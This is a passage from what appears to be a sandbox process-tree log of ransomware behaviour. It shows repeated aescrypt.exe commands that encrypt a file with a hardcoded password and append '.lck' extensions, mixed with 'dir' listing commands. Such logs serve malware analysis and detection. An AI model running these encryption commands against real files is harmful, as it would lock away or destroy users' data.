- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
    3⤵
    PID:1168
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
    3⤵
    PID:4560
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
    3⤵
    PID:5152
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
    3⤵
    PID:6128
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5220
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5232
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:3340
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:2184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:5236
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
    3⤵
    PID:740
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
    3⤵
    PID:5280
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
    3⤵
    PID:5192
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
    3⤵
    PID:5224
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
    3⤵
    PID:5268
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
    3⤵
    PID:1348
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5248
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5244
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5288
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5292
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:5360
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
    3⤵
    PID:5388
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
    3⤵
    PID:5412
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
    3⤵
    PID:5424
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
    3⤵
    PID:5436
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
    3⤵
    PID:5452
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
    3⤵
    PID:5496
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5516
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5532
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5548
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5572
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5476
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4628
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
    3⤵
    PID:5648
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
    3⤵
    PID:5700
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
    3⤵
    PID:5712
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
    3⤵
    PID:5748
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
    3⤵
    PID:5788
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
    3⤵
    PID:5808
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5824
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5904
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5940
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:4108
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:4756
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5860
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:5920
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
    3⤵
    PID:5844
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
    3⤵
    PID:3332
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
    3⤵
    PID:6040
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
    3⤵
    PID:5980
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
    3⤵
    PID:5952
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
    3⤵
    PID:5996
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6032
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:2268
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6064
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6060
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6108
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:4288
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5148
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:3844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:5104
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
    3⤵
    PID:5168
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
    3⤵
    PID:3776
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
    3⤵
    PID:5124
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
    3⤵
    PID:6136
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
    3⤵
    PID:5208
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
    3⤵
    PID:1560
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:1368
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5264
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:2236
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5188
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5204
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5272
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5260
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5216
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5312
